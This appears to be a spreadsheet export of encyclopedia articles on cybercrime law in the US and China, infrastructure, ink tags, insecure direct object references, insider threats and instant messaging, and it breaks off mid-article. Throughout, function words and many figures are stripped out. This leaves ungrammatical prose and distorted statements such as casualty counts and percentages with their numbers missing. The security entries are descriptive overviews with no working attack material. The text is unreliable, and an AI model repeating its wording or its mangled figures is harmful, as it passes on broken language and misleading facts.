branch agencies (e.g., federal trade commission us), regulatory agencies (e.g., australian communications media authority), separate agencies (e.g., enisa industry (e.g., maawg, involved partnership. 2004, london action plan founded, aims promoting international spam enforcement cooperation address spam related problems, online fraud deception, phishing, dissemination viruses. case analysis u.s. according sophos, u.s. remains top-spamming country source one-fifth world's spam. cross-border cyber-exfiltration operations tension international legal norms, u.s. enforcement efforts collect foreign cyber evidence raises complex jurisdictional questions. since fighting cybercrime involves great amount sophisticated legal measures, milestones rather full texts provided here. legal regulatory measures first federal computer crime statute computer fraud abuse 1984 (cfaa). 1986, electronic communications privacy (ecpa) amendment federal wiretap law. “national infrastructure protection 1996”. “cyberspace electronic security 1999”. “patriot 2001”. digital millennium copyright (dmca) enacted 1998. cyber security enhancement (csea) passed 2002. can-spam issued 2003 subsequent implementation measures made ftc.in 2005 passed anti-phishing added crimes code.in 2009, obama administration released cybersecurity report policy. cybersecurity 2010, bill seeking increase collaboration public private sector cybersecurity issues.a number agencies u.s. fight cybercrime, including fbi, national infrastructure protection center, national white collar crime center, internet fraud complaint center, computer crime intellectual property section department justice (doj), computer hacking intellectual property unit doj, computer emergency readiness team/coordination center (cert/cc) carnegie-mellon, on.cybersafe public service project designed educate users internet critical need personal computer security. technical measures cloud computing: make infrastructures resilient attacks functions data backup well. however, cloud concentrates sensitive data, becomes increasingly attractive cybercriminals. better encryption methods developed deal phishing, smishing illegal data interception activities. federal bureau investigation special technical units developed carnivore, computer surveillance system intercept packets sent installed, assist investigation cybercrime. industry collaboration public-private partnership: 2006, internet corporation assigned names numbers (icann) signed agreement united states department commerce (united states department commerce) partnered multistakeholder model consultation. 2008, second annual cyber storm exercise conference held, involving nine states, four foreign governments, federal agencies private companies.in 2010, national cyber security alliance’s public awareness campaign launched partnership u.s. department homeland security, federal trade commission, others.incentives isp: though cost security measures increases, internet service providers (isp) encouraged fight cybercrime consumer support, good reputation brand image among consumer peer well. international cooperation signed also ratified convention cybercrime. united states actively participated g8/oecd/apec/oas/u.s.-china cooperation cracking international cyber crime. future challenges privacy tracking cybercrime challenged becomes controversial issue. public-private partnership. u.s. government gets involved development products, many companies worry stifle innovation, even undermining efforts develop secure technology products. legislative proposals considered u.s. congress could potentially intrusive private industry, prevent enterprises responding effectively emerging changing threats. cyber attacks security breaches increasing frequency sophistication, targeting organizations individuals malware anonymization techniques evade current security controls. current perimeter-intrusion detection, signature-based malware, anti-virus solutions providing little defense. relatively organizations recognized organized cyber criminal networks, rather hackers, greatest potential cyber security threat; even fewer prepared address threat. china january 2009, china ranked no.3 spam-producing country world, according data compiled security vendor sophos. sophos ranks china spam producer no.20, right behind spain.china's underground economy booming estimated billion 2009. hacking, malware spam immensely popular. with patriotic hacktivism, people hack defend country. legal regulatory measures criminal basic identifies enforcement concerning cybercrime. 2000, decision internet security standing committee passed. 2000, china issued series internet rules prohibit anyone propagate pornography, virus scams. 2003, china signed general assembly resolution 57/239 “creation global culture cybersecurity”. 2003, china signed geneva declaration principles world summit information society. 2006, anti-spam initiative launched. july 2006, asean regional forum (arf), included china, issued statement members implement cybercrime cybersecurity laws accordance national conditions referring relevant international instruments”. 2009, asean-china framework agreement network information security emergency response adopted. 2009, agreement within shanghai cooperation organization information security made. technical measures internet censorship: china made tougher register internet domains stricter content control help reduce spam."golden shield project" "the great firewall china": national internet control censorship project. 2009, green software: restricts access secret list sites, monitors users’activity.operating system change: china trying around using linux, though technical impediments solve. industry collaboration internet society china group behind china's anti-spam effort working standards better ways cooperating fight cybercrime. isps become better working customers spam problem. international cooperation 2005, china signed london action plan spam, international effort curb problem. anti-spam “beijing declaration”2006 international anti-spam summit held. apec working group telecommunications agreed action plan 2010–2015 included “fostering safe trusted environment”. january 2011, united states china committed first time head state level work together bilateral basis issues cybersecurity. "fighting spam build trust" first effort help overcome trust deficit china united states cybersecurity. cyber security china summit 2011 held shanghai. achievement future challenges successfully cracking spam volume 2009. however, insufficient criminal laws regulations great impediments fighting cybercrime. lack electronic evidence laws regulations, rank existing internet control regulations technological impediments altogether limit efficiency chinese governments' enforcement. also computer crime computer security convention cybercrime cyberethics cyberstalking identity theft internet fraud legal aspects computing references external links global cybersecurity agenda convention cybercrime sophos security reports us-china joint efforts cybercrime, eastwest institute computer crime intellectual property section, united states department justice handbook legal procedures computer network misuse countries</t>
  </si>
  <si>
    <t>Infrastructure</t>
  </si>
  <si>
    <t>infrastructure facilities systems serve country, city, area, encompasses services facilities necessary economy, households firms function. infrastructure composed public private physical structures roads, railways, bridges, tunnels, water supply, sewers, electrical grids, telecommunications (including internet connectivity broadband access). general, infrastructure defined "the physical components interrelated systems providing commodities services essential enable, sustain, enhance societal living conditions" maintain surrounding environment.especially light massive societal transformations needed mitigate adapt climate change, contemporary infrastructure conversations frequently focus sustainable development green infrastructure. acknowledging importance, international community created policy focused sustainable infrastructure sustainable development goals, especially sustainable development goal "industry, innovation infrastructure". describe different types infrastructure classify distinct kinds: hard infrastructure soft infrastructure. hard infrastructure refers physical networks necessary functioning modern industry. this includes roads, bridges, railways. soft infrastructure refers institutions maintain economic, health, social, environmental, cultural standards country. this includes educational programs, official statistics, parks recreational facilities, enforcement agencies, emergency services. linguistic origin word "infrastructure" used french since 1875 english since 1887, originally meaning "the installations form basis operation system". word imported french, already used establishing roadbed substrate material, required railroad tracks constructed pavement could laid word combination latin prefix "infra", meaning "below", many constructions underground (for example, tunnels, water systems, railways), french word "structure" (derived latin word "structure"). army term achieved currency united states formation nato 1940s, 1970 adopted urban planners modern civilian sense. classifications 1987 national research council panel adopted term "public works infrastructure", referring "... specific functional modes highways, streets, roads, bridges; mass transit; airports airways; water supply water resources; wastewater management; solid-waste treatment disposal; electric power generation transmission; telecommunications; hazardous waste management combined system modal elements comprise. comprehension infrastructure spans public works facilities, also operating procedures, management practices, development policies interact together societal demand physical world facilitate transport people goods, provision water drinking variety uses, safe disposal society's waste products, provision energy needed, transmission information within communities." american society civil engineers publishes "infrastructure report card" represents organizations opinion condition various infrastructure every years. 2017 grade categories, namely aviation, bridges, dams, drinking water, energy, hazardous waste, inland waterways, levees, parks recreation, ports, rail, roads, schools, solid waste, transit wastewater.: united states received rating “d+” infrastructure. this aging infrastructure result governmental neglect inadequate funding. united states presumably looks upgrade existing infrastructure, sustainable measures could consideration design, build, operation plans. personal embody personal infrastructure think terms human capital. human capital defined encyclopædia britannica “intangible collective resources possessed individuals groups within given population". goal personal infrastructure determine quality economic agents’ values. this results three major tasks: task economic proxies economic process (teachers, unskilled qualified labor, etc.); importance personal infrastructure individual (short long-term consumption education); social relevance personal infrastructure. essentially, personal infrastructure maps human impact infrastructure related economy, individual growth, social impact. institutional institutional infrastructure branches term "economic constitution". according gianpiero torrisi, institutional infrastructure object economic legal policy. compromises grown sets norms. refers degree fair treatment equal economic data determines framework within economic agents formulate economic plans carry co-operation others. sustainable sustainable infrastructure refers processes design construction take consideration environmental, economic, social impact. included section several elements sustainable schemes, including materials, water, energy, transportation, waste management infrastructure. although endless factors consideration, covered section. material material infrastructure defined “those immobile, non-circulating capital goods essentially contribute production infrastructure goods services needed satisfy basic physical social requirements economic agents". there distinct qualities material infrastructures: fulfillment social needs mass production. first characteristic deals basic needs human life. second characteristic non-availability infrastructure goods services. today, various materials used build infrastructure. prevalent ones asphalt, concrete, steel, masonry, wood, polymers composites. economic according business dictionary, economic infrastructure defined "internal facilities country make business activity possible, communication, transportation distribution networks, financial institutions markets, energy supply systems". economic infrastructure support productive activities events. this includes roads, highways, bridges, airports, cycling infrastructure, water distribution networks, sewer systems, irrigation plants. social social infrastructure broadly defined construction maintenance facilities support social services. social infrastructures created increase social comfort promote economic activity. these include schools, parks playgrounds, structures public safety, waste disposal plants, hospitals, sports areas. core core assets provide essential services monopolistic characteristics. investors seeking core infrastructure look five different characteristics: income, volatility returns, diversification, inflation protection, long-term liability matching. core infrastructure incorporates main types infrastructure, roads, highways, railways, public transportation, water, supply. basic basic infrastructure refers main railways, roads, canals, harbors docks, electromagnetic telegraph, drainage, dikes, land reclamation. consist well-known common features infrastructure come across daily lives (buildings, roads, docks). complementary complementary infrastructure refers things like light railways, tramways, gas/electricity/water supply. complement something means bring perfection complete complementary infrastructure deals little parts engineering world make life convenient efficient. they needed ensure successful usage marketing already finished product, like case road bridges. other examples lights sidewalks, landscaping around buildings, benches pedestrians rest. applications engineering construction engineers generally limit term "infrastructure" describe fixed assets form large network; words, hard infrastructure. efforts devise generic definitions infrastructures typically referred network aspects structures, accumulated value investments networks assets. definition 1998 defined infrastructure network assets "where system whole intended maintained indefinitely specified standard service continuing replacement refurbishment components". civil defense economic development civil defense planners developmental economists generally refer hard soft infrastructure, including public services schools hospitals, emergency services police fire fighting, basic services economic sector. notion infrastructure-based development combining long-term infrastructure investments government agencies central regional levels public private partnerships proven popular among economists asia (notably singapore china), mainland europe, latin america. military military infrastructure buildings permanent installations necessary support military forces, whether stationed bases, deployed engaged operations. examples include barracks, headquarters, airfields, communications facilities, stores military equipment, port installations, maintenance stations. communications communications infrastructure informal formal channels communication, political social networks, beliefs held members particular groups, well information technology, software development tools. still underlying conceptual uses idea infrastructure provides organizing structure support system organization serves, whether city, nation, corporation, collection people common interests. examples include infrastructure, research infrastructure, terrorist infrastructure, employment infrastructure, tourism infrastructure. related concepts term "infrastructure" confused following overlapping related concepts. land improvement land development general terms contexts include infrastructure, context discussion infrastructure would refer smaller-scale systems works included infrastructure, typically limited single parcel land, owned operated landowner. example, irrigation canal serves region district would included infrastructure, private irrigation systems individual land parcels would considered land improvements, infrastructure. service connections municipal service public utility networks would also considered land improvements, infrastructure.the term "public works" includes government-owned operated infrastructure well public buildings, schools courthouses. public works generally refers physical assets needed deliver public services. public services include infrastructure services generally provided government. ownership financing infrastructure owned managed governments private companies, sole public utility railway companies. generally, roads, major airports ports, water distribution systems, sewage networks publicly owned, whereas energy telecommunications networks privately owned. publicly owned infrastructure paid taxes, tolls, metered user fees, whereas private infrastructure generally paid metered user fees. major investment projects generally financed issuance long-term bonds.government-owned operated infrastructure developed operated private sector public-private partnerships, addition public sector. 2008 united states example, public spending infrastructure varied 2.3% 3.6% since 1950. many financial institutions invest infrastructure. developing world according researchers overseas development institute, lack infrastructure many developing countries represents significant limitations economic growth achievement millennium development goals (mdgs). infrastructure investments maintenance expensive, especially areas landlocked, rural sparsely populated countries africa. argued infrastructure investments contributed half africa's improved growth performance 1990 2005, increased investment necessary maintain growth tackle poverty. returns investment infrastructure significant, average thirty forty percent returns telecommunications (ict) investments, forty percent electricity generation, eighty percent roads. regional differences demand infrastructure consumers companies much higher amount invested. there severe constraints supply side provision infrastructure asia. infrastructure financing invested asia-pacific (around us$48 billion) needed (us$228 billion) around us$180 billion every year.in latin america, three percent (around us$71 billion) would need invested infrastructure order satisfy demand, 2005, example, around percent invested leaving financing approximately us$24 billion.in africa, order reach seven percent annual growth calculated required meet mdgs 2015 would require infrastructure investments fifteen percent gdp, around us$93 billion year. fragile states, thirty-seven percent would required. sources funding infrastructure source financing infrastructure varies significantly across sectors. some sectors dominated government spending, others overseas development (oda), others private investors. california, infrastructure financing districts established local governments physical facilities services within specified area using property increases. order facilitate investment private sector developing countries' infrastructure markets, necessary design risk-allocation mechanisms carefully, given higher risks markets.the spending money comes government less used from 1930s 2019, united states went spending 4.2% 2.5% infrastructure. these investments accrued, fact, according 2017 asce infrastructure report card, 2016 2025, infrastructure underinvested trillion. compared global percentages, united states tied second-to-last place, average percentage 2.4%. this means government spends less money repairing infrastructure infrastructure whole.in sub-saharan africa, governments spend around us$9.4 billion total us$24.9 billion. irrigation, governments represent almost spending. transport energy majority investment government spending. water supply sanitation, private sector represents majority capital expenditure. overall, aid, private sector, non-oecd financiers exceed government spending. private sector spending alone equals state capital expenditure, though majority focused infrastructure investments. external financing increased 2000s (decade) africa alone external infrastructure investments increased us$7 billion 2002 us$27 billion 2009. china, particular, emerged important investor. coronavirus implications 2020 covid-19 pandemic exacerbated underfunding infrastructure globally accumulating decades. pandemic increased unemployment widely disrupted economy. this serious impacts households, businesses, federal, state local governments. this especially detrimental infrastructure dependent funding government agencies—with state local governments accounting approximately spending public infrastructure united states.governments facing enormous decreases revenue, economic downturns, overworked health systems, hesitant workforces, resulting huge budget deficits across board. however, must also scale public investment ensure successful reopening, boost growth employment, green economies. unusually large scale packages needed covid-19 accompanied widespread calls “greening” meet dual goals economic recovery environmental sustainability. however, march 2021, small fraction covid-19 related fiscal measures found climate friendly. sustainable infrastructure although readily apparent much effort needed repair economic damage inflicted coronavirus epidemic, immediate return business usual could environmentally harmful, shown 2007-08 financial crisis united states. while ensuing economic slowdown reduced global greenhouse emissions 2009, emissions reached record high 2010, partially governments' implemented economic stimulus measures minimal consideration environmental consequences. concern whether pattern repeat itself. post-covid-19 period could determine whether world meets misses emissions goals 2015 paris agreement limits global warming degrees degrees c.unfortunately, result covid-19 epidemic, host factors could jeopardize low-carbon recovery plan: includes reduced attention global political stage (2020 climate summit postponed 2021), relaxing environmental regulations pursuit economic growth, decreased prices preventing low-carbon technologies competitive, finally, stimulus programs take away funds could used process decarbonization. research suggests recovery plan based lower-carbon emissions could make significant emissions reductions needed battle climate change, also create economic growth jobs high-carbon recovery plan would. study published oxford review economic policy, economists economic officials reported “green” economic-recovery initiatives performed least well less “green” initiatives. there also calls independent body could provide comparable assessment countries’ fiscal policies, promoting transparency accountability international level.in addition, econometric study published economic modelling journal, analysis government energy technology spending showed spending renewable energy sector created five jobs million dollars invested spending fossil fuels. since sustainable infrastructure beneficial economic environmental context, represents future infrastructure. especially increasing pressure climate change diminishing natural resources, infrastructure needs maintain economic development development, high quality life residents, also protect environment natural resources. sustainable energy sustainable energy infrastructure includes types renewable energy power plants well means exchange plant homes businesses utilize energy. renewable energy includes well researched widely implemented methods wind, solar, hydraulic power, well newer less commonly used types power creation fusion energy. sustainable energy infrastructure must maintain strong supply relative demand, must also maintain sufficiently prices consumers decrease demand. type renewable energy infrastructure fails meet consumption price requirements ultimately forced market prevailing renewable energy sources. sustainable water sustainable water infrastructure focused community’s sufficient access clean, safe drinking water. water public good along electricity, means sustainable water catchment distribution systems must remain affordable members population. "sustainable water" refer nation community's ability self-sustainable, enough water meet multiple needs including agriculture, industry, sanitation, drinking water. also refer holistic effective management water resources. increasingly, policy makers regulators incorporating nature-based solutions (nbs nbs) attempts achieve sustainable water infrastructure. sustainable waste management sustainable waste management systems minimize amount waste products produced individuals corporations. commercial waste management plans transitioned simple waste removal plans comprehensive plans focused reducing total amount waste produced removal. sustainable waste management beneficial environmentally, also costs businesses reduce amount disposed goods. sustainable transportation sustainable transportation includes shift away private, greenhouse emitting cars favor adopting methods transportation either carbon neutral reduce carbon emissions bikes electric systems. additionally, cities must invest appropriate built environments ecologically preferable modes transportation. cities need invest public transportation networks, well bike path networks among sustainable solutions incentivize citizens alternate transit options. reducing urban dependency cars fundamental goal developing sustainable transportation, cannot accomplished without coordinated focus creating methods transportation providing networks equally efficient existing networks aging highway systems. sustainable materials another solution transition sustainable infrastructure using sustainable materials. material sustainable needed amount produced without depleting non-renewable resources. also environmental impacts disrupting established steady-state equilibrium materials also resilient, renewable, reusable, recyclable.today, concrete common materials used infrastructure. there twice much concrete used construction building materials combined. backbone industrialization, used bridges, piers, pipelines, pavements, buildings. however, serve connection cities, transportation people goods, protection land flooding erosion, last years. many built within last years, means many infrastructures need substantial maintenance continue functioning. however, concrete sustainable. production concrete contributes world’s greenhouse emissions. tenth world’s industrial water usage producing concrete. even transporting materials concrete production sites adds airborne pollution. furthermore, production sites infrastructures strip away agricultural land could fertile soil habitats vital ecosystem. green infrastructure green infrastructure type sustainable infrastructure. green infrastructure uses plant soil systems restore natural processes needed manage water create healthier urban environments. practical sense, refers decentralized network stormwater management practices, includes green roofs, trees, bioretention infiltration, permeable pavement. green infrastructure become increasingly popular strategy recent years effectiveness providing ecological, economic, social benefits—including positively impacting energy consumption, quality, carbon reduction sequestration. green roofs green roof rooftop partially completely covered growing vegetation planted membrane. also includes additional layers, including root barrier drainage irrigation systems. there several categories green roofs, including extensive (have growing media depth ranging inches) intensive (have growing media depth greater inches). benefit green roofs reduce stormwater runoff ability store water growing media, reducing runoff entering sewer system waterways, also decreases risk combined sewer overflows. they reduce energy usage since growing media provides additional insulation, reduces amount solar radiation roof’s surface, provides evaporative cooling water plants, reduce roof surface temperatures heat influx. green roofs also reduce atmospheric carbon dioxide since vegetation sequesters carbon and, since reduce energy usage urban heat island reducing roof temperature, also lower carbon dioxide emissions electricity generation. tree planting tree planting provides host ecological, social, economic benefits. trees intercept rain, support infiltration water storage soil, diminish impact raindrops barren surfaces, minimize soil moisture transpiration, help reduce stormwater runoff. additionally, trees contribute recharging local aquifers improve health watershed systems. trees also reduce energy usage providing shade releasing water atmosphere cools reduces amount heat absorbed buildings. finally, trees improve quality absorbing harmful pollutants reducing amount greenhouse gases. bioretention infiltration practices there variety types bioretention infiltration practices, including rain gardens bioswales. rain garden planted small depression natural slope includes native shrubs flowers. they temporarily hold absorb rain water effective removing nutrients chemicals sediments runoff. result, soak water conventional gardens. bioswales planted paved areas like parking lots sidewalks made allow overflow sewer system trapping silt pollutants, normally left impermeable surfaces. both rain gardens bioswales mitigate flood impacts prevent stormwater polluting local waterways; increase usable water supply reducing amount water needed outdoor irrigation; improve quality minimizing amount water going treatment facilities, also reduces energy usage and, result, reduces pollution since less greenhouse gases emitted. smart cities smart cities utilize innovative methods design implementation various sectors infrastructure planning create communities operate higher level relative sustainability traditional counterparts. sustainable city, urban resilience well infrastructure reliability must present. urban resilience defined city’s capacity quickly adapt recover infrastructure defects, infrastructure reliability means systems must work efficiently continuing maximize output. when urban resilience infrastructure reliability interact, cities able produce level output similarly reasonable costs compared sustainable communities, still maintaining ease operation usage. masdar city masdar city proposed zero emission smart city contracted united arab emirates. some individuals referred planned settlement “utopia-like”, fact feature multiple sustainable infrastructure elements, including energy, water, waste management, transportation. masdar city power infrastructure containing renewable energy methods including solar energy.masdar city located desert region, meaning sustainable collection distribution water dependent city’s ability utilize water innovative stages water cycle. city groundwater, greywater, seawater, blackwater, water resources obtain drinking landscaping water.initially, masdar city waste-free. recycling waste management waste reduction methods encouraged. additionally, city implement system convert waste fertilizer, decrease amount space needed waste accumulation well provide environmentally friendly alternative traditional fertilizer production methods. cars allowed masdar city, contributing carbon emissions within city boundaries. instead, alternative transportation options prioritized infrastructure development. this means bike lane network accessible comprehensive, options also available. also references bibliography koh, myong (2018) green infrastructure financing: institutional investors, ppps bankable projects, london: palgrave macmillan. isbn 978-3-319-71769-2. nurre, sarah "restoring infrastructure systems: integrated network design scheduling (inds) problem." european journal operational research. (12/2012), (3), 794–806. ascher, kate; researched wendy marech (2007). works: anatomy city (reprint. ed.). york: penguin press. isbn 978-0-14-311270-9. larry beeferman, "pension fund investment infrastructure: resource paper", capital matter (occasional paper series), december 2008 eberhard, "infrastructure regulation developing countries", ppiaf working paper (2007) world bank nicolas firzli vincent bazi, "infrastructure investments austerity: pension sovereign funds perspective", published jointly revue analyse financière, 2011 issue, 34–37 usak/jtw july 2011 (online edition) hayes, brian (2005). infrastructure: book everything industrial landscape (1st ed.). york city: norton. isbn 978-0-393-32959-9. huler, scott (2010). grid: plot land, average neighborhood, systems make world work. emmaus, rodale. isbn 978-1-60529-647-0. georg inderst, "pension fund investment infrastructure", oecd working papers insurance private pensions, (2009) dalakoglou, dimitris (2017). road: ethnography (im)mobility, space cross-border infrastructures. manchester: manchester university press/ oxford university press. external links body knowledge infrastructure regulation next generation infrastructures international research programme report card america's infrastructure dirk laak: infrastructures, version: 1.0, docupedia zeitgeschichte, 20th 2021</t>
  </si>
  <si>
    <t>Ink tag</t>
  </si>
  <si>
    <t>tags form retail loss prevention commonly used clothing retailers. special equipment required remove tags clothing. when tags forcibly removed, glass vials containing permanent break, causing spill clothing, effectively destroying tags fall loss prevention category called benefit denial. name suggests, denies shoplifter benefit efforts. despite this, shoplifters found ways around them. tags effective used together another anti-shoplifting system shoplifter product remove tag. also pack references</t>
  </si>
  <si>
    <t>Insecure direct object reference</t>
  </si>
  <si>
    <t>insecure direct object reference (idor) type access control vulnerability digital security.this occur application application programming interface uses identifier direct access object internal database check access control authentication. example, request sent site directly uses easily enumerated unique identifier (such http://foo.com/doc/1234), provide exploit unintended access records. directory traversal attack considered special case idor.the vulnerability significant concern many years listed open application security project’s (owasp) vulnerabilities. examples november 2020, firm silent breach identified idor vulnerability united states department defense site privately reported dod's vulnerability disclosure program. fixed adding user session mechanism account system, would require authenticating site first.it reported parler social networking service used sequential post ids, enabled scraping terabytes data service january 2021. researcher responsible project said inaccurate. references</t>
  </si>
  <si>
    <t>Insider threat management</t>
  </si>
  <si>
    <t>insider threat management process preventing, combating, detecting, monitoring employees, remote vendors contractors, fortify organization's data insider threats theft, fraud damage. background insider individual employed agency access facilities, sensitive information, organizational data, information systems, equipment. they accounts giving legitimate access computer systems, access originally given serve performance duties; permissions could abused harm organization. insiders often familiar organization's data intellectual property well methods place protect them. this makes easier insider circumvent security controls aware. physical proximity data means insider need hack organizational network outer perimeter traversing firewalls; rather building already, often direct access organization's internal network. insider threats harder defend attacks outsiders since insider already legitimate access organization's information assets.insiders comprise permanent temporary employees, vendors, contractors, suppliers, ex-employees. most common insiders elevated access utilize sensitive information without drawing suspicion. however, anyone insider threat organization dispose, secure, utilize sensitive information described agency's regulations. there cases individuals compromised opposing agency exploited individual's financial status, threats life, factors order force individual comply opposing agencies demands. criminal activity insider attempt steal property information personal gain, benefit another organization country. these attacks range information data stolen destruction business property. insiders perform following threats organization: espionage, criminal enterprise, fraud, theft unauthorized disclosure information (classified information, sensitive information, intellectual property, trade secrets, personally identifiable information (pii) information technology sabotage action results loss degradation organization resources capabilities ability accomplish mission business function. acts terrorism common insider identifiers insiders similar characteristics compiled order help determine possible threats. most researchers identified insiders mainly show antisocial behavior include limited machiavellianism, narcissism, psychopathy.on information system side, list common behavioral indicators known insiders: downloading substantial amounts data external drives accessing confidential data relevant user's role emailing sensitive information personal account attempts bypass security controls requests clearance higher-level access without need; frequently accessing workspace outside normal working hours; irresponsible social media behaviors; maintaining access sensitive data termination; using unauthorized external storage devices; visible disgruntlement toward employers co-workers; chronic violation organization policies; decline work performance; mobile devices photograph otherwise record computer screens, common work areas data centers; excessive printers scanners; electronic communications containing excessive negative language; installing unapproved software; communication high-risk current former employees; traveling countries known intellectual property (ip) theft hosting competitors; violation corporate policies; network crawling, data hoarding copying internal repositories; anomalies work hours; attempts access restricted areas; indications living beyond one's means discussions resigning business ventures; complaints hostile, abnormal, unethical illegal behaviors examples insider threats impacts insider threat incidents severe, costly damaging. incidents insiders malicious. non-malicious insider incidents damaging malicious incidents. listed link numerous insider threat incidents severe impacts organizations. cyber security data breach, edward snowden, june 2013 military data leaked wikileaks, u.s. soldier chelsea manning, january 2010 contractor stole terabytes data years, harold martin iii, october 2016 terrorism orlando nightclub shooting killed people, omar mateen, june 2016 metro transit trying assist isis, nicholas young, august 2016 references</t>
  </si>
  <si>
    <t>Insider threat</t>
  </si>
  <si>
    <t>insider threat malicious threat organization comes people within organization, employees, former employees, contractors business associates, inside information concerning organization's security practices, data computer systems. threat involve fraud, theft confidential commercially valuable information, theft intellectual property, sabotage computer systems. overview insiders accounts giving legitimate access computer systems, access originally given serve performance duties; permissions could abused harm organization. insiders often familiar organization's data intellectual property well methods place protect them. this makes easier insider circumvent security controls aware. physical proximity data means insider need hack organizational network outer perimeter traversing firewalls; rather building already, often direct access organization's internal network. insider threats harder defend attacks outsiders, since insider already legitimate access organization's information assets.an insider attempt steal property information personal gain benefit another organization country. threat organization could also malicious software left running computer systems former employees, so-called logic bomb. research centers insider threat active area research academia government. cert coordination center carnegie-mellon university maintains cert insider threat center, includes database cases insider threats, including instances fraud, theft sabotage; database used research analysis. cert's insider threat team also maintains informational blog help organizations businesses defend insider crime.the threat defense personnel security research center (dod perserec) also recently emerged national resources within united states america. threat hosts annual conference, summit. they also maintain website contains resources conference. complimenting efforts, companion podcast created, voices summit. 2022, threat created interdisciplinary journal, counter insider threat research practice (citrap) publishes research insider threat detection. research findings according analysis data, breaches reported information commissioners office (ico) 2019 result mistakes made users. this previous years.a 2018 whitepaper, reported companies surveyed confirmed insider attacks organization previous months, saying insider attacks become frequent. report published july 2012 insider threat u.s. financial sector gives statistics insider threat incidents: malicious acts committed work working hours; perpetrators planned actions beforehand; perpetrators described "difficult" "disgruntled". insider identified cases. financial gain motive cases, revenge cases, people carrying malicious acts financial difficulties time. department defense personnel security research center published report describes approaches detecting insider threats. earlier published case studies insider attacks information technology professionals.cyber security experts believe negligent insiders victims phishing attack, whereby receive email appears come legitimate source company. these emails normally contain malware form hyperlinks typologies ontologies multiple classification systems ontologies proposed classify insider threats.traditional models insider threat identify three broad categories: malicious insiders, people take advantage access inflict harm organization; negligent insiders, people make errors disregard policies, place organizations risk; infiltrators, external actors obtain legitimate access credentials without authorization. criticisms insider threat research criticized. critics argued insider threat poorly defined concept. forensically investigating insider data theft notoriously difficult, requires novel techniques stochastic forensics. data supporting insider threat generally proprietary (i.e., encrypted data). theoretical/conceptual models insider threat often based loose interpretations research behavioral social sciences, using "deductive principles intuitions subject matter expert."adopting sociotechnical approaches, research also argued need consider insider threat perspective social system. schoenherr gone argue "surveillance requires understanding sanctioning systems framed, employees respond surveillance, workplace norms deemed relevant, ‘deviance’ means, e.g., deviation justified organization norm failure conform organizational norm conflicts general social values." treating employees potential insider threats, organizations might create conditions create insider threats. also computer security insider threat management mole (espionage) naval criminal investigative service threat (computer) references external links 2021 insider threat report gurucul what insider threats look like decade? [shadowsight] naval espionage stopping dangerous insider threat cybersecurity detecting insider threat cyberseer dtex systems 2018 insider threat intelligence report ponemon institute cost insider threat report 2020 insider threat report gurucul cost consequences insider threat infographic</t>
  </si>
  <si>
    <t>Instant messaging</t>
  </si>
  <si>
    <t>instant messaging (im) technology type online chat allowing real-time text transmission internet another computer network. messages typically transmitted parties, user inputs text triggers transmission recipient(s), connected common network. differs email conversations instant messaging happen real-time (hence "instant"). most modern applications (sometimes called "social messengers", "messaging apps" "chat apps") push technology also features emojis graphical smileys), file transfer, chatbots, voice video chat capabilities. instant messaging systems tend facilitate connections specified known users (often using contact list also known "buddy list" "friend list"), standalone applications integrated e.g. wider social media platform, website instance used conversational commerce. also consist conversations "chat rooms". depending protocol, technical architecture peer-to-peer (direct point-to-point transmission) client–server service center retransmits messages sender communication device). usually distinguished text messaging typically simpler normally uses cellular phone networks. instant messaging pioneered early internet era; protocol earliest achieve wide adoption. later 1990s, among first closed commercialized instant messengers, several rival services appeared afterwards became popular internet. beginning first introduction 2005, blackberry messenger, initially available blackberry smartphones, soon became popular mobile instant messaging apps worldwide. instance used mobile messaging united kingdom indonesia. instant messaging remains popular today; apps widely used smartphone apps: 2018 billion monthly users whatsapp facebook messenger, million monthly active users wechat. overview instant messaging communication technologies used text-based communication (private messaging) (chat room) participants internet types networks (see also messenger). im–chat happens real-time. importance online chat instant messaging differ technologies email perceived quasi-synchrony communications users. some systems permit messages sent users 'logged (offline messages), thus removing differences email (often done sending message associated email account).im allows effective efficient communication, allowing immediate receipt acknowledgment reply. however basically necessarily supported transaction control. many cases, instant messaging includes added features make even popular. example, users webcams, talk directly free internet using microphone headphones loudspeakers. many applications allow file transfers, although usually limited permissible file-size. usually possible save text conversation later reference. instant messages often logged local message history, making similar persistent nature emails. major services controlled corresponding companies. they usually follow client–server model clients first connect central server. this requires users trust server messages generally accessed company. companies compelled reveal user's communication. companies also suspend user accounts reason. non-im types chat include multicast transmission, usually referred "chat rooms", participants might anonymous might previously known (for example collaborators project using chat facilitate communication). instant message service center (imsc) network element mobile telephone network delivers instant messages. when user sends message another user, phone sends message imsc. imsc stores message delivers destination user available. imsc usually configurable time limit long store message. companies make many imscs world miyowa, followap other players include acision, colibria, ericsson, nokia, comverse technology, wireless, jinny software, miyowa, feelingk others. term "instant messenger" service mark time warner used software affiliated united states. reason, april 2007, instant messaging client formerly named gaim gaim) announced would renamed "pidgin". clients each modern service generally provides client, either separately installed piece software, browser-based client. they normally centralised networks servers platform's operators, unlike peer-to-peer protocols like xmpp. these usually work within network, although allow limited function services. third party client software applications exist connect major services. there class instant messengers uses serverless model, require servers, network consists clients. there several serverless messengers: retroshare, tox, bitmessage, ricochet, ring. some examples popular services today include whatsapp, facebook messenger, wechat, messenger, telegram, viber, line, snapchat. popularity certain apps greatly differ different countries. certain apps emphasis certain uses example skype focuses video calling, slack focuses messaging file sharing work teams, snapchat focuses image messages. some social networking services offer messaging services component overall platform, facebook's facebook messenger, others direct messaging function additional adjunct component social networking platforms, like instagram, reddit, tumblr, tiktok, clubhouse twitter, either directly chat rooms. features private group messaging private chat allows private conversation another person group. privacy aspect also enhanced applications timer feature, like snapchat, messages conversations automatically deleted time limit reached. public group chat features allow users communicate multiple people time. calling many major services applications offer call feature user-to-user calls, conference calls, voice messages. call functionality useful professionals utilize application work purposes hands-free method. videotelephony using webcam also possible some. games entertainment some applications include in-app games entertainment. yahoo! messenger example introduced users could play game viewed friends real-time. facebook messenger application built option play computer games people chat, including games like tetris blackjack. payments though relatively feature, peer-to-peer payments available major messaging platforms. this functionality allows individuals application communication financial tasks. lack service also makes messaging apps advantageous financial applications. major platforms facebook messenger wechat already offer payment feature, functionality likely become standard amongst apps competing market. history though term dates 1990s, instant messaging predates internet, first appearing multi-user operating systems like compatible time-sharing system (ctss) multiplexed information computing service (multics) mid-1960s. initially, systems used notification systems services like printing, quickly used facilitate communication users logged machine. ctss facilitated communication text message people.parallel instant messaging early online chat facilities, earliest talkomatic (1973) plato system, allowed people chat simultaneously 512x512 plasma display lines text status line person). during bulletin board system (bbs) phenomenon peaked 1980s, systems incorporated chat features similar instant messaging; freelancin' roundtable prime example. first general-availability 